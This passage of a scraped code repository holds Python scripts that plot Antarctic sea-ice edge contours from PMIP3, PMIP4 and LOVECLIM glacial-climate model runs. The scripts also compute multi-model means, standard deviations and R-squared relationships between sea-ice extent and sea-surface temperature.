marker='o',markersize=1.5,transform=ccrs.PlateCarree())\n ax[n].plot([maybeWSIlon], [maybeWSIlat],color='black', marker='o',markersize=1.5,transform=ccrs.PlateCarree())\n\n\n# PMIP3\n# Austral summer all models\n# could make this cleaner and do loops but I just need to get it done at this point\n\nax[0].contour(CCSM4_sum_3.LON,CCSM4_sum_3.LAT,CCSM4_sum_3,colors=['#ff7f0e'],linestyles=['solid'],levels=[15], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[0].contour(GISS_sum_3.LON,GISS_sum_3.LAT,GISS_sum_3,colors=['#17becf'],linestyles=['solid'],levels=[15], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[0].contour(MPI_sum_3.LON,MPI_sum_3.LAT,MPI_sum_3,colors=['#bcbd22'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\n\nax[0].contour(CNRM_3_sum.lon,CNRM_3_sum.lat,CNRM_3_sum.sic,colors=['black'],levels=[15],linestyles=['solid'], 
transform=ccrs.PlateCarree(),linewidths=1.5,zorder=6)\nax[0].contour(FGOALS_3_sum.lon,FGOALS_3_sum.lat,FGOALS_3_sum.sic,colors=['#e377c2'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[0].contour(IPSL_3_sum.lon,IPSL_3_sum.lat,IPSL_3_sum.sic,colors=['#2ca02c'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[0].contour(MIROC_3_sum.lon,MIROC_3_sum.lat,MIROC_3_sum.sic,colors=['#9467bd'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[0].contour(MRI_3_sum.lon,MRI_3_sum.lat,MRI_3_sum.sic,colors=['#1f77b4'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\n\n\n# austral summer MMM\n\n# believe I can do this using LOVE2_sum_3 and CNRM_3_sum.sic for example but just sticking with what I know works and can change after\nMMM_CCSM4 = (MMM_sum.CCSM4R2 + MMM_sum.CCSM4R1)/2\nMMM_GISS = (MMM_sum.GISSP150 + MMM_sum.GISSP151)/2\nMMM_MPI = (MMM_sum.MPIP1 + MMM_sum.MPIP2)/2\nMMM_sum['CCSM4'] = MMM_CCSM4\nMMM_sum['GISS'] = MMM_GISS\nMMM_sum['MPI'] = MMM_MPI\nMMM_sum = MMM_sum.drop_vars('CCSM4R1')\nMMM_sum = MMM_sum.drop_vars('CCSM4R2')\nMMM_sum = MMM_sum.drop_vars('GISSP150')\nMMM_sum = MMM_sum.drop_vars('GISSP151')\nMMM_sum = MMM_sum.drop_vars('MPIP1')\nMMM_sum = MMM_sum.drop_vars('MPIP2')\nMMM_LOVE1_sum_3 = LOVE1_sum_3*100\nMMM_LOVE2_sum_3 = LOVE2_sum_3*100\n\n# multi model mean\nMMM_sum_mean = (MMM_sum.CNRM + MMM_sum.FGOALS + MMM_sum.IPSL + MMM_sum.MIROC + MMM_sum.MRI + MMM_sum.CCSM4 + MMM_sum.MPI + MMM_sum.GISS)/8\n\n# calculating STD\nvar1=(MMM_sum.CCSM4-MMM_sum_mean)**2\nvar2=(MMM_sum.GISS-MMM_sum_mean)**2\nvar3=(MMM_sum.MPI-MMM_sum_mean)**2\nvar4=(MMM_sum.CNRM-MMM_sum_mean)**2\nvar5=(MMM_sum.FGOALS-MMM_sum_mean)**2\nvar6=(MMM_sum.IPSL-MMM_sum_mean)**2\nvar7=(MMM_sum.MIROC-MMM_sum_mean)**2\nvar8=(MMM_sum.MRI-MMM_sum_mean)**2\n# var9=(MMM_LOVE1_sum_3 -MMM_sum_mean)**2\n# var10=(MMM_LOVE2_sum_3 -MMM_sum_mean)**2\nSTD=((var1+var2+var3+var4+var5+var6+var7+var8)/8)**0.5\nSTD2=(MMM_sum_mean+STD)\nSTD3=(MMM_sum_mean-STD)\n\n# plotting\nax[4].contour(MMM_sum_mean.LON,MMM_sum_mean.LAT,MMM_sum_mean,colors=['black'],levels=[15], transform=ccrs.PlateCarree(),linewidths=2.5)\nax[4].contour(STD2.LON,STD2.LAT,STD2,levels=[15],colors=['black'], transform=ccrs.PlateCarree())\nax[4].contour(STD3.LON,STD3.LAT,STD3,levels=[15],colors=['black'], transform=ccrs.PlateCarree())\n\n# austral winter all models\nax[1].contour(CCSM4_win_3.LON,CCSM4_win_3.LAT,CCSM4_win_3,colors=['#ff7f0e'],linestyles=['solid'],levels=[15], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[1].contour(GISS_win_3.LON,GISS_win_3.LAT,GISS_win_3,colors=['#17becf'],linestyles=['solid'],levels=[15], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[1].contour(MPI_win_3.LON,MPI_win_3.LAT,MPI_win_3,colors=['#bcbd22'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\n\nax[1].contour(CNRM_3_win.lon,CNRM_3_win.lat,CNRM_3_win.sic,colors=['black'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5,zorder=6)\nax[1].contour(FGOALS_3_win.lon,FGOALS_3_win.lat,FGOALS_3_win.sic,colors=['#e377c2'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[1].contour(IPSL_3_win.lon,IPSL_3_win.lat,IPSL_3_win.sic,colors=['#2ca02c'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[1].contour(MIROC_3_win.lon,MIROC_3_win.lat,MIROC_3_win.sic,colors=['#9467bd'],levels=[15],linestyles=['solid'], 
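# all PMIP3 winter ice edges are drawn at the 15% concentration level\n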
transform=ccrs.PlateCarree(),linewidths=1.5)\nax[1].contour(MRI_3_win.lon,MRI_3_win.lat,MRI_3_win.sic,colors=['#1f77b4'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\n\n\n# austral winter MMM\nMMM_CCSM4 = (MMM_win.CCSM4R2 + MMM_win.CCSM4R1)/2\nMMM_GISS = (MMM_win.GISSP150 + MMM_win.GISSP151)/2\nMMM_MPI = (MMM_win.MPIP1 + MMM_win.MPIP2)/2\nMMM_win['CCSM4'] = MMM_CCSM4\nMMM_win['GISS'] = MMM_GISS\nMMM_win['MPI'] = MMM_MPI\nMMM_win = MMM_win.drop_vars('CCSM4R1')\nMMM_win = MMM_win.drop_vars('CCSM4R2')\nMMM_win = MMM_win.drop_vars('GISSP150')\nMMM_win = MMM_win.drop_vars('GISSP151')\nMMM_win = MMM_win.drop_vars('MPIP1')\nMMM_win = MMM_win.drop_vars('MPIP2')\nMMM_LOVE1_win_3 = LOVE1_win_3*100\nMMM_LOVE2_win_3 = LOVE2_win_3*100\n\n# multi model mean\nMMM_win_mean = (MMM_win.CNRM + MMM_win.FGOALS + MMM_win.IPSL + MMM_win.MIROC + MMM_win.MRI + MMM_win.CCSM4 + MMM_win.MPI + MMM_win.GISS)/8\n\n# calculating STD\nvar1=(MMM_win.CCSM4-MMM_win_mean)**2\nvar2=(MMM_win.GISS-MMM_win_mean)**2\nvar3=(MMM_win.MPI-MMM_win_mean)**2\nvar4=(MMM_win.CNRM-MMM_win_mean)**2\nvar5=(MMM_win.FGOALS-MMM_win_mean)**2\nvar6=(MMM_win.IPSL-MMM_win_mean)**2\nvar7=(MMM_win.MIROC-MMM_win_mean)**2\nvar8=(MMM_win.MRI-MMM_win_mean)**2\n# var9=(MMM_LOVE1_win_3 -MMM_win_mean)**2\n# var10=(MMM_LOVE2_win_3 -MMM_win_mean)**2\nSTD=((var1+var2+var3+var4+var5+var6+var7+var8)/8)**0.5\nSTD4=(MMM_win_mean+STD)\nSTD5=(MMM_win_mean-STD)\n\n# plotting\nax[5].contour(MMM_win_mean.LON,MMM_win_mean.LAT,MMM_win_mean,colors=['black'],levels=[15], transform=ccrs.PlateCarree(),linewidths=2.5)\nax[5].contour(STD4.LON,STD4.LAT,STD4,levels=[15],colors=['black'], transform=ccrs.PlateCarree())\nax[5].contour(STD5.LON,STD5.LAT,STD5,levels=[15],colors=['black'], transform=ccrs.PlateCarree())\n\n# LOVECLIM PMIP3\n\n# summer all models\nax[8].contour(LOVE1_sum_3.LON,LOVE1_sum_3.LAT,LOVE1_sum_3,colors=['#F7DC6F'],levels=[0.15],linestyles=['dotted'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[8].contour(LOVE2_sum_3.LON,LOVE2_sum_3.LAT,LOVE2_sum_3,colors=['#F7DC6F'],levels=[0.15],linestyles=['dashdot'], transform=ccrs.PlateCarree(),linewidths=1.5)\n\n# MMM summer\n\nMMM = (MMM_LOVE2_sum_3 + MMM_LOVE1_sum_3)/2\nvar1 = (MMM_LOVE1_sum_3 - MMM)**2\nvar2 = (MMM_LOVE2_sum_3 - MMM)**2\nSTD = ((var1+var2)/2)**0.5\nSTD1 = (MMM+STD)\nSTD2 = (MMM-STD)\n\nax[12].contour(MMM.LON,MMM.LAT,MMM,colors=['black'],levels=[15], transform=ccrs.PlateCarree(),linewidths=2.5)\nax[12].contour(STD1.LON,STD1.LAT,STD1,levels=[15],colors=['black'], transform=ccrs.PlateCarree())\nax[12].contour(STD2.LON,STD2.LAT,STD2,levels=[15],colors=['black'], transform=ccrs.PlateCarree())\n\n\n# winter all models\nax[9].contour(LOVE1_win_3.LON,LOVE1_win_3.LAT,LOVE1_win_3,colors=['#F7DC6F'],levels=[0.15],linestyles=['dotted'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[9].contour(LOVE2_win_3.LON,LOVE2_win_3.LAT,LOVE2_win_3,colors=['#F7DC6F'],levels=[0.15],linestyles=['dashdot'], transform=ccrs.PlateCarree(),linewidths=1.5)\n\n# MMM winter\nMMM = (MMM_LOVE1_win_3 + MMM_LOVE2_win_3 )/2\nvar1 = (MMM_LOVE1_win_3 - MMM)**2\nvar2 = (MMM_LOVE2_win_3 - MMM)**2\nSTD = ((var1+var2)/2)**0.5\nSTD1 = (MMM+STD)\nSTD2 = (MMM-STD)\n\nax[13].contour(MMM.LON,MMM.LAT,MMM,colors=['black'],levels=[15], transform=ccrs.PlateCarree(),linewidths=2.5)\nax[13].contour(STD1.LON,STD1.LAT,STD1,levels=[15],colors=['black'], transform=ccrs.PlateCarree())\nax[13].contour(STD2.LON,STD2.LAT,STD2,levels=[15],colors=['black'], transform=ccrs.PlateCarree())\n\n#PMIP 4 
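summer\n# NOTE: CESM12 IFRAC and IPSL fract_sic are unit fractions, hence the *100 below; the other PMIP4 fields are already in percent\n#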
summer\n\nax[2].contour(CCSM4UoT_summer.lon,CCSM4UoT_summer.lat,CCSM4UoT_summer.siconc,colors=['#ff7f0e'],linestyles=['solid'],levels=[15], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[2].contour(CESM12_summer.lon,CESM12_summer.lat,CESM12_summer.IFRAC*100,colors=['#8c564b'],linestyles=['solid'],levels=[15], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[2].contour(AWI_summer.lon,AWI_summer.lat,AWI_summer.siconca,colors=['#B8255F'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[2].contour(MPI_summer.lon,MPI_summer.lat,MPI_summer.siconc,colors=['#bcbd22'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[2].contour(MIROC_summer.lon,MIROC_summer.lat,MIROC_summer.siconc,colors=['#9467bd'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[2].contour(IPSL_summer.lon,IPSL_summer.lat,IPSL_summer.fract_sic*100,colors=['#2ca02c'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[2].contour(LOVEsummer.lon,LOVEsummer.lat,LOVEsummer,colors=['#F7DC6F'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\n\nMMM_summer_mean = (CCSM4UoT_summer.siconc+CESM12_summer.IFRAC*100+LOVEsummer+AWI_summer.siconca+MPI_summer.siconc+MIROC_summer.siconc+IPSL_summer.fract_sic*100)/7\nvar1=(CCSM4UoT_summer.siconc-MMM_summer_mean)**2\nvar2=(CESM12_summer.IFRAC*100-MMM_summer_mean)**2\nvar3=(AWI_summer.siconca-MMM_summer_mean)**2\nvar4=(MPI_summer.siconc-MMM_summer_mean)**2\nvar5=(MIROC_summer.siconc-MMM_summer_mean)**2\nvar6=(IPSL_summer.fract_sic*100-MMM_summer_mean)**2\nvar7=(LOVEsummer-MMM_summer_mean)**2\nSTD=((var1+var2+var3+var4+var5+var6+var7)/7)**0.5\nSTD2=(MMM_summer_mean+STD)\nSTD3=(MMM_summer_mean-STD)\n\nax[6].contour(MMM_summer_mean.lon,MMM_summer_mean.lat,MMM_summer_mean,colors=['black'],levels=[15], transform=ccrs.PlateCarree(),linewidths=2.5)\nax[6].contour(STD2.lon,STD2.lat,STD2,levels=[15],colors=['black'], transform=ccrs.PlateCarree())\nax[6].contour(STD3.lon,STD3.lat,STD3,levels=[15],colors=['black'], transform=ccrs.PlateCarree())\n\n# PMIP4 winter\n\nax[3].contour(CCSM4UoT_winter.lon,CCSM4UoT_winter.lat,CCSM4UoT_winter.siconc,colors=['#ff7f0e'],linestyles=['solid'],levels=[15], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[3].contour(CESM12_winter.lon,CESM12_winter.lat,CESM12_winter.IFRAC*100,colors=['#8c564b'],linestyles=['solid'],levels=[15], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[3].contour(AWI_winter.lon,AWI_winter.lat,AWI_winter.siconca,colors=['#B8255F'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[3].contour(MPI_winter.lon,MPI_winter.lat,MPI_winter.siconc,colors=['#bcbd22'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[3].contour(MIROC_winter.lon,MIROC_winter.lat,MIROC_winter.siconc,colors=['#9467bd'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[3].contour(IPSL_winter.lon,IPSL_winter.lat,IPSL_winter.fract_sic*100,colors=['#2ca02c'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[3].contour(LOVEwinter.lon,LOVEwinter.lat,LOVEwinter,colors=['#F7DC6F'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\n\nMMM_winter_mean = 
(CCSM4UoT_winter.siconc+CESM12_winter.IFRAC*100+LOVEwinter+AWI_winter.siconca+MPI_winter.siconc+MIROC_winter.siconc+IPSL_winter.fract_sic*100)/7\nvar1=(CCSM4UoT_winter.siconc-MMM_winter_mean)**2\nvar2=(CESM12_winter.IFRAC*100-MMM_winter_mean)**2\nvar3=(AWI_winter.siconca-MMM_winter_mean)**2\nvar4=(MPI_winter.siconc-MMM_winter_mean)**2\nvar5=(MIROC_winter.siconc-MMM_winter_mean)**2\nvar6=(IPSL_winter.fract_sic*100-MMM_winter_mean)**2\nvar7=(LOVEwinter-MMM_winter_mean)**2\nSTD=((var1+var2+var3+var4+var5+var6+var7)/7)**0.5\nSTD2=(MMM_winter_mean+STD)\nSTD3=(MMM_winter_mean-STD)\n\nax[7].contour(MMM_winter_mean.lon,MMM_winter_mean.lat,MMM_winter_mean,colors=['black'],levels=[15], transform=ccrs.PlateCarree(),linewidths=2.5)\nax[7].contour(STD2.lon,STD2.lat,STD2,levels=[15],colors=['black'], transform=ccrs.PlateCarree())\nax[7].contour(STD3.lon,STD3.lat,STD3,levels=[15],colors=['black'], transform=ccrs.PlateCarree())\n\n\n\n# PMIP4 Proxy artist\nAWI = mlines.Line2D([], [], color='#B8255F', linestyle ='-',label = 'AWI-ESM-1')\nMIROC = mlines.Line2D([], [], color='#9467bd', linestyle ='-',label = 'MIROC-ES2L')\nMPI = mlines.Line2D([], [], color='#bcbd22', linestyle ='-', label = 'MPI-ESM1-2')\nIPSL = mlines.Line2D([], [], color='#2ca02c', linestyle ='-', label = 'IPSL-CM5A2')\nCCSM4UoT = mlines.Line2D([], [], color='#ff7f0e', linestyle ='-', label = 'UoT-CCSM4')\nCESM = mlines.Line2D([], [], color='#8c564b', linestyle ='-', label = 'CESM1.2')\niLOVECLIM = mlines.Line2D([], [], color='#F7DC6F', linestyle ='-', label = 'LOVECLIM')\nax[11].legend(handles=[MIROC,IPSL,MPI,AWI,iLOVECLIM,CESM,CCSM4UoT],frameon=False,title='PMIP4 models')\n\n#PMIP3 Proxy artist\nMIROC = mlines.Line2D([], [], color='#9467bd', linestyle ='-',label = 'MIROC-ESM-P')\nGISS = mlines.Line2D([], [], color='#17becf', linestyle ='-',label = 'GISS-E2-R')\nIPSL = mlines.Line2D([], [], color='#2ca02c', linestyle ='-', label = 'IPSL-CM5A-LR')\nCCSM4 = mlines.Line2D([], [], color='#ff7f0e', linestyle ='-', label = 'CCSM4')\nCNRM = mlines.Line2D([], [], color='black', linestyle ='-', label = 'CNRM')\nMPI = mlines.Line2D([], [], color='#bcbd22', linestyle ='-', label = 'MPI-ESM-P')\nFGOALS= mlines.Line2D([], [], color='#e377c2', linestyle ='-', label = 'FGOALS-G2')\nMRI = mlines.Line2D([], [], color='#1f77b4', linestyle ='-', label = 'MRI-CGCM3')\n#ax[11].legend(handles=[CNRM,GISS,IPSL,MIROC,MPI,MRI,FGOALS,CCSM4],bbox_to_anchor=(1.04,1), loc=\"upper left\",frameon=False,title='PMIP3 models')\nax[10].legend(handles=[CNRM,GISS,IPSL,MIROC,MPI,MRI,FGOALS,CCSM4],frameon=False,title='PMIP3 models')\n\n# LOVE proxy artists\nLOVE1 = mlines.Line2D([], [], color='#F7DC6F', linestyle ='dotted',label = 'weakNA')\nLOVE2 = mlines.Line2D([], [], color='#F7DC6F', linestyle ='dashdot',label = 'weakNA_AB')\nax[14].legend(handles=[LOVE1,LOVE2],frameon=False,title='LOVECLIM sensitivity runs')\n\n# MMM proxy artists\nMMM = mlines.Line2D([], [], color='black', linewidth=2.5, linestyle ='-', label = 'Multi-model mean')\nSTD = mlines.Line2D([], [], color='black', linestyle ='-', label = 'Standard deviation')\nax[13].legend(handles=[MMM,STD],bbox_to_anchor=(1.5,0.5), loc=\"center left\",borderaxespad=1,frameon=False,title='Multi-model mean')\n\n# Observational data proxy artist\nred = mlines.Line2D([], [], color='red', marker='o', linestyle='None',markersize=4, label='Absence of sea ice')\nblue = mlines.Line2D([], [], color='blue', marker='o', linestyle='None',markersize=4, label='Presence of sea ice')\nblack = mlines.Line2D([], [], color='black', marker='o', 
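# marker-only legend entries for the three proxy-data categories\n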
linestyle='None',markersize=4, label='Possible presence of sea ice')\n#ax[15].legend(handles=[red,blue,black],bbox_to_anchor=(1.04,1), loc=\"upper left\",frameon=False,title='Proxy data')\nax[15].legend(handles=[red,blue,black],frameon=False,title='Proxy data')\nplt.subplots_adjust(hspace=0.09,wspace=0.07)\n\n# all in one legend\n#rcParams['font.family'] = 'arial'\nax[10].axis('off')\nax[11].axis('off')\nax[14].axis('off')\nax[15].axis('off')\n# ax[0].legend(handles=[CNRM,GISS,IPSL,MIROC,MPI,MRI,FGOALS,CCSM4UoT,AWI,CESM,iLOVECLIM,LOVE1,LOVE2],frameon=False,ncol=2)\n# ax[5].legend(handles=[red,blue,black],frameon=False)\n#plt.show()\nplt.savefig('Figures/Figure1.eps')\n"
},
{
"alpha_fraction": 0.7119901180267334,
"alphanum_fraction": 0.7255871295928955,
"avg_line_length": 26.89655113220215,
"blob_id": "0e28f2e2e745ddaa8dd182bab1780be89f88515e",
"content_id": "47eba8fcb02eee07c3da98ecf42afbbab1529ae8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 809,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 29,
"path": "/slopeSSTproxy.py",
"repo_name": "RyanAGreen/PMIP_seaice",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\nproxy = pd.read_excel('~/Desktop/UNSW/Table_Recap_LGM_Final.xlsx',engine=\"openpyxl\",sheet_name='Data')\ndata = proxy[['Latitude', 'LGM']]\ndata = data[3:]\ndata = data.dropna()\ndata = data.reset_index(drop=True)\ncolumn = data['Latitude']\n\ndf = data[data.Latitude > -52]\nplt.scatter(data.Latitude,data.LGM,color='darkgray')\nave = data\nave.Latitude = ave.Latitude.round()\nave = ave.astype(float)\n\nave2 = df\nave2.Latitude = ave2.Latitude.round()\nave2 = ave2.astype(float)\ncolumn = ave['Latitude']\nproxyavg = ave2.groupby('Latitude').mean().reset_index()\n#plt.plot(proxyavg.Latitude,proxyavg.LGM,color='darkgray')\n#plt.show()\nslope = np.polyfit(proxyavg.Latitude,proxyavg.LGM,1)[0]\nprint(slope)\nprint(column.min())\n#print(proxyavg.LGM.mean())\n"
},
{
"alpha_fraction": 0.5631610155105591,
"alphanum_fraction": 0.6982961297035217,
"avg_line_length": 35.212764739990234,
"blob_id": "c6983410aa88321f9c6ddbdcbb4f9e2b506a5f45",
"content_id": "253ebb2208d64c9fd8c867eabb215e6217169c5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3404,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 94,
"path": "/Rsquared.py",
"repo_name": "RyanAGreen/PMIP_seaice",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport scipy as sp\nimport matplotlib.path as mpath\nimport matplotlib.lines as mlines\nimport matplotlib.patches as mpatches\nimport xarray as xr\nimport matplotlib as mpl\nfrom scipy import stats\n\n# most area to least area finished with MMM\n\n# PMIP3\n# CCSM4, FGOALS, MRI, MPI, MIROC, IPSL, GISS, CNRM (MMM is commented after because removed later MMM)\n\nseaiceedge_PMIP3 = [-55.5,-61.5,-62.5,-65,-66.5,-70,-65.5,-75.5] #,-62.5]\nSSTtest_PMIP3 = [-0.5208,1.998,2.885,2.692,2.911,2.884,3.708,5.582] #,2.95]\nseaicearea_PMIP3 = [ 27.46,13.62,12.54,5.187,3.530,2.414,2.391,.06047] #,9.34]\ncolorsPMIP3 = ['#ff7f0e','#e377c2','#1f77b4','#bcbd22','#9467bd','#2ca02c','#17becf','black']\n\n# PMIP4\n#UoTCCSM4, CESM1.2, LOVECLIM, AWI, MPI, IPSL, MIROC (MMM is commented after because removed later MMM)\nseaiceedge_PMIP4 = [-53,-57.5,-59.5,-62,-65,-70,-75.5] #,-59]\nSSTtest_PMIP4 = [-1.017,0.161,2.218,0.957,2.451,3.404,5.583] #,1.774]\nseaicearea_PMIP4 = [ 33.15,23.75,17.55,14.73,5.18,2.46,0.36] #,19.08]\n# need to decide color for MMM\ncolorsPMIP4 = ['#ff7f0e','#8c564b','#F7DC6F','#B8255F','#bcbd22','#2ca02c','#9467bd']\n\n\n# LOVECLIM\n# weakNA_AB (LOVE2), weak_AB (LOVE1) (MMM is commented after because removed later MMM)\nseaiceedge_LOVE = [-58.5, -59.5] #,-59]\nSSTtest_LOVE = [1.61,2.15] #, 1.875]\nseaicearea_LOVE = [20.27, 15.73] #, 18.47]\ncolorsLOVE = ['#F7DC6F','#F7DC6F']\n\n\n# proxy\nproxyseaicearea = [15.35]\nproxyseaiceedge = [-61.5]\nproxySST = [1.52]\ncolorsproxy=['white']\nfacecolorsproxy=['black']\n\n# total (excluding MMM and proxy)\n# PMIP3, PMIP4, LOVECLIM PMIP3\n#seaiceedge_total = np.array([-55.5,-61.5,-62.5,-65,-66.5,-70,-65.5,-75.5,-53,-57.5,-59.5,-62,-65,-70,-75.5])\nseaiceedge_total = seaiceedge_PMIP3 + seaiceedge_PMIP4 + seaiceedge_LOVE\n#SSTtest_total = [-0.5208,1.998,2.885,2.692,2.911,2.884,3.708,5.582,-1.017,0.161,2.218,0.957,2.451,3.404,5.583]\nSSTtest_total = SSTtest_PMIP3 + SSTtest_PMIP4 + SSTtest_LOVE\n#seaicearea_total = [27.46,13.62,12.54,5.187,3.530,2.414,2.391,.06047,33.15,23.75,17.55,14.73,5.18,2.46,0.36]\nseaicearea_total = seaicearea_PMIP3 + seaicearea_PMIP4 + seaicearea_LOVE\n\n\ncorrelation_matrix_sie = np.corrcoef(SSTtest_total, seaiceedge_total)\ncorrelation_xy_sie = correlation_matrix_sie[0,1]\nr_squared_sie = correlation_xy_sie**2\nprint('Rsquared for sea ice edge vs SST is ',r_squared_sie)\n\ncorrelation_matrix_sia = np.corrcoef(SSTtest_total, seaicearea_total)\ncorrelation_xy_sia = correlation_matrix_sia[0,1]\nr_squared_sia = correlation_xy_sia**2\nprint('Rsquared for sea ice area vs SST is ',r_squared_sia)\n\n# checking answer\ndef polyfit(x, y, degree):\n results = {}\n\n coeffs = np.polyfit(x, y, degree)\n # Polynomial Coefficients\n results['polynomial'] = coeffs.tolist()\n\n correlation = np.corrcoef(x, y)[0,1]\n\n # r\n results['correlation'] = correlation\n # r-squared\n results['determination'] = correlation**2\n\n return results\nprint(polyfit(SSTtest_total,seaicearea_total,1))\n\n\nfrom sklearn.metrics import r2_score\n\nR_square = r2_score(SSTtest_total, seaicearea_total)\nprint('Coefficient of Determination', R_square)\n\nslope, intercept, r_value, p_value, std_err = stats.linregress(SSTtest_total, seaicearea_total)\nprint(\"r-squared:\", r_value**2)\n\nslope, intercept, r_value, p_value, std_err = stats.linregress(SSTtest_total, seaiceedge_total)\nprint(\"r-squared:\", r_value**2)\n"
},
{
"alpha_fraction": 0.6356196999549866,
"alphanum_fraction": 0.6956601738929749,
"avg_line_length": 47.990989685058594,
"blob_id": "c4ed3fde7c03fc0c64a991d9d85fee4553e668ef",
"content_id": "0a2be6785db458276199d67cffb4339c82fe4d25",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10878,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 222,
"path": "/Figure3.py",
"repo_name": "RyanAGreen/PMIP_seaice",
"src_encoding": "UTF-8",
"text": "# Trying to rewrite figure 3 in Python\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport scipy as sp\nimport matplotlib.path as mpath\nimport matplotlib.lines as mlines\nimport matplotlib.patches as mpatches\nimport xarray as xr\nimport matplotlib as mpl\nimport cartopy.crs as ccrs\nimport cmocean\nimport cartopy\nimport cartopy.feature as cfeature\nimport matplotlib.ticker as mticker\nfrom cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER\n\nSST = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/MIROC/SST/tos_Omon_MIROC-ES2L_lgm_r1i1p1f2_gn_320001-329912.nc',decode_times=False)\nSST = SST.mean(dim='time')\n\nproxy = pd.read_excel('~/Desktop/UNSW/Table_Recap_LGM_Final.xlsx',engine=\"openpyxl\",sheet_name='Data')\ndata = proxy[['Latitude','Longitude', 'LGM']]\ndata = data[3:]\ndata = data.dropna()\ndata = data.reset_index(drop=True)\n# lat is -90:90 and lon is -180:180\nlat = data['Latitude']\nlon = data['Longitude']\nsst = data['LGM']\ndata['LGM'] = data['LGM'].astype(float)\ndef LonTo360(dlon):\n # Convert longitudes to 0-360 deg\n dlon = ((360 + (dlon % 360)) % 360)\n return dlon\nlonconverted = LonTo360(lon)\n#Read the data and convert into numpy array\ny = np.array(data.Latitude)\nx = np.array(data.Longitude)\nz = np.array(data.LGM)\n\n# PMIP3 SST\nCNRM_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP3SST/tos_Oclim_CNRM-CM5_lgm_r1i1p1_180001-199912-climregrid.nc',decode_times=False)\nFGOALS_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP3SST/tos_Oclim_FGOALS-g2_lgm_r1i1p1_055001-064912-climregrid.nc',decode_times=False)\nIPSL_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP3SST/tos_Oclim_IPSL-CM5A-LR_lgm_r1i1p1_260101-280012-climregrid.nc',decode_times=False)\nMIROC_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP3SST/tos_Oclim_MIROC-ESM_lgm_r1i1p1_460001-469912-climregrid.nc',decode_times=False)\nMRI_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP3SST/MRISST_winter_PMIP3.nc',decode_times=False)\nCCSM4_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP3SST/CCSM4SST_winter_PMIP3.nc',decode_times=False)\nMPI_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP3SST/MPISST_winter_PMIP3.nc',decode_times=False)\nGISS_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP3SST/GISSSST_winter_PMIP3.nc',decode_times=False)\nCNRM_3 = xr.concat([CNRM_3.sel(time=(CNRM_3.time[1])), CNRM_3.sel(time=(CNRM_3.time[2]))], dim=\"time\")\nCNRM_3 = CNRM_3.mean(dim='time')\nFGOALS_3= xr.concat([FGOALS_3.sel(time=(FGOALS_3.time[2])), FGOALS_3.sel(time=(FGOALS_3.time[3]))], dim=\"time\")\nFGOALS_3 = FGOALS_3.mean(dim='time')\nIPSL_3 = xr.concat([IPSL_3.sel(time=(IPSL_3.time[1])), IPSL_3.sel(time=(IPSL_3.time[2]))], dim=\"time\")\nIPSL_3 = IPSL_3.mean(dim='time')\nMIROC_3 = xr.concat([MIROC_3.sel(time=(MIROC_3.time[1])), MIROC_3.sel(time=(MIROC_3.time[2]))], dim=\"time\")\nMIROC_3 = MIROC_3.mean(dim='time')\nMRI_3 = MRI_3.rename({\"LON\": \"lon\",\"LAT\": 